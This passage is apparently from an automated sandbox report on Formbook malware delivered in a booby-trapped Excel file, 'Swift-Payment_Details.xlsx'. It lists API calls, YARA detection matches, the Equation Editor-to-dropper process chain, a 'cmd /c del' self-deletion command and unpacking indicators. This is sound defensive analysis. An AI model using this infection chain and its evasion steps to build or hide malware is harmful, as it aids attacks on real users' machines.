Source: C:\Users\Public\vbc.exe, Code function: 7_2_004183AA NtAllocateVirtualMemory,
Source: C:\Users\Public\vbc.exe, Code function: 7_2_009600C4 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe, Code function: 7_2_00960048 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe, Code function: 7_2_00960078 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe, Code function: 7_2_009607AC NtCreateMutant,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe, Code function: 7_2_0095F9F0 NtClose,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe, Code function: 7_2_0095F900 NtReadFile,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe, Code function: 7_2_0095FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe, Code function: 7_2_0095FAE8 NtQueryInformationProcess,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe, Code function: 7_2_0095FBB8 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe, Code function: 7_2_0095FB68 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe, Code function: 7_2_0095FC90 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe, Code function: 7_2_0095FC60 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe, Code function: 7_2_0095FD8C NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe, Code function: 7_2_0095FDC0 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe, Code function: 7_2_0095FEA0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe, Code function: 7_2_0095FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe, Code function: 7_2_0095FFB4 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe, Code function: 7_2_009610D0 NtOpenProcessToken,
Source: C:\Users\Public\vbc.exe, Code function: 7_2_00960060 NtQuerySection,
Source: C:\Users\Public\vbc.exe, Code function: 7_2_009601D4 NtSetValueKey,
Source: C:\Users\Public\vbc.exe, Code function: 7_2_0096010C NtOpenDirectoryObject,
Source: C:\Users\Public\vbc.exe, Code function: 7_2_00961148 NtOpenThread,
Source: C:\Users\Public\vbc.exe, Code function: 7_2_0095F8CC NtWaitForSingleObject,
Source: C:\Users\Public\vbc.exe, Code function: 7_2_00961930 NtSetContextThread,
Source: C:\Users\Public\vbc.exe, Code function: 7_2_0095F938 NtWriteFile,
Source: C:\Users\Public\vbc.exe, Code function: 7_2_0095FAB8 NtQueryValueKey,
Source: C:\Users\Public\vbc.exe, Code function: 7_2_0095FA20 NtQueryInformationFile,
Source: C:\Users\Public\vbc.exe, Code function: 7_2_0095FA50 NtEnumerateValueKey,
Source: C:\Users\Public\vbc.exe, Code function: 7_2_0095FBE8 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_024300C4 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_024307AC NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_0242FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_0242FAE8 NtQueryInformationProcess,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_0242FAB8 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_0242FB50 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_0242FB68 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_0242FBB8 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_0242F900 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_0242F9F0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_0242FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_0242FFB4 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_0242FC60 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_0242FDC0 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_0242FD8C NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_02430048 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_02430060 NtQuerySection,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_02430078 NtResumeThread,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_024310D0 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_02431148 NtOpenThread,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_0243010C NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_024301D4 NtSetValueKey,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_0242FA50 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_0242FA20 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_0242FBE8 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_0242F8CC NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_02431930 NtSetContextThread,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_0242F938 NtWriteFile,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_0242FE24 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_0242FEA0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_0242FF34 NtQueueApcThread,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_0242FFFC NtCreateProcessEx,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_02430C40 NtGetContextThread,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_0242FC48 NtSetInformationFile,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_0242FC30 NtOpenProcess,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_0242FC90 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_0242FD5C NtEnumerateKey,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_02431D80 NtSuspendThread,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_000881D0 NtCreateFile,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_00088280 NtReadFile,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_00088300 NtClose,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_000883B0 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_00088222 NtCreateFile,
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 9_2_000883AA NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0040102E
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_00401030
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0041B8FB
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_00408C6C
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_00408C70
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0041B57A
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_00402D88
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0041C58A
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_00402D90
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_00402FB0
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0096E0C6
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0099D005
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0098905A
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_00973040
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0096E2E9
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A11238
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_009963DB
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0096F3CF
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_00972305
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_00977353
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_009BA37B
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_00981489
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_009A5485
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0098C5F0
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0097351F
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_00974680
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0097E6C1
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A12622
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_009F579A
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0097C7BC
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_009A57C3
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A0F8EE
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0097C85C
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0099286D
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_009729B2
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A1098E
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_009869FE
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_009F5955
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A23A83
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A1CBA4
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0096FBD7
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_009FDBDA
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_024E1238
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0243E2E9
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_02447353
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0248A37B
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_02442305
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0243F3CF
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_024663DB
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_02443040
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0245905A
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0246D005
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0243E0C6
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_024E2622
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0244E6C1
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_02444680
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_024757C3
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_024C579A
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0244C7BC
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_02475485
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_02451489
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0244351F
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0245C5F0
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_024F3A83
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_02467B00
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0243FBD7
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_024CDBDA
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_024ECBA4
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0244C85C
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0246286D
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_024DF8EE
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_024C5955
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_024569FE
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_024E098E
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_024429B2
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0245EE4C
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_02472E2F
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0246DF7C
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_02450F3F
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0244CD5B
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_02470D3B
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_024DFDDD
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0008B57A
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0008C58A
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0008B8FB
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00078C6C
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00078C70
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00072D88
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00072D90
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00072FB0
          Source: Swift-Payment_Details.xlsx | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Users\Public\vbc.exe | Code function: String function: 009B3F92 appears 71 times
          Source: C:\Users\Public\vbc.exe | Code function: String function: 009B373B appears 177 times
          Source: C:\Users\Public\vbc.exe | Code function: String function: 0096DF5C appears 83 times
          Source: C:\Users\Public\vbc.exe | Code function: String function: 0096E2A8 appears 31 times
          Source: C:\Users\Public\vbc.exe | Code function: String function: 009DF970 appears 59 times
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: String function: 0243E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: String function: 0248373B appears 238 times
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: String function: 02483F92 appears 108 times
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: String function: 0243DF5C appears 107 times
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: String function: 024AF970 appears 81 times
          Source: 6.2.vbc.exe.270000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.vbc.exe.270000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2372100550.0000000000180000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2372100550.0000000000180000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2158065205.0000000000270000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2158065205.0000000000270000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000001.2156137275.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000001.2156137275.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2201997636.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2201997636.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2201775977.0000000000260000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2201775977.0000000000260000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2371920280.0000000000070000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2371920280.0000000000070000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2202517740.0000000000530000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2202517740.0000000000530000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: explorer.exe, 00000008.00000000.2168587227.0000000003C40000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
          Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSX@9/13@6/6
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$Swift-Payment_Details.xlsx
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRF42D.tmp
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
          Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: Swift-Payment_Details.xlsx | ReversingLabs: Detection: 28%
          Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
          Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: Swift-Payment_Details.xlsx | Static file information: File size 1326080 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: vbc.exe, wscript.exe
          Source: Binary string: wscript.pdb source: vbc.exe, 00000007.00000002.2202709093.0000000000589000.00000004.00000020.sdmp
          Source: Binary string: wscript.pdbN source: vbc.exe, 00000007.00000002.2202709093.0000000000589000.00000004.00000020.sdmp
          Source: Swift-Payment_Details.xlsx | Initial sample: OLE indicators vbamacros = False
          Source: Swift-Payment_Details.xlsx | Initial sample: OLE indicators encrypted = True

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\Public\vbc.exe | Unpacked PE file: 7.2.vbc.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;
          Source: C:\Users\Public\vbc.exe | Code function: 6_2_00403DDB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_004062F6 pushfd ; ret
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0041B3C5 push eax; ret
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_004153FC push eax; retf
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0041B47C push eax; ret
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0041B412 push eax; ret
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0041B41B push eax; ret
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_00415CE7 pushad ; ret
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0041C4EE push 133511A3h; retf
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_00414D71 push ss; iretd
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_00415D38 pushad ; ret
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0243DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_000762F6 pushfd ; ret
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0008B3C5 push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_000853FC push eax; retf
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0008B41B push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0008B412 push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0008B47C push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0008C4EE push 133511A3h; retf
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00085CE7 pushad ; ret
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00085D38 pushad ; ret
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00084D71 push ss; iretd
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader1[1].exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe

          Boot Survival:

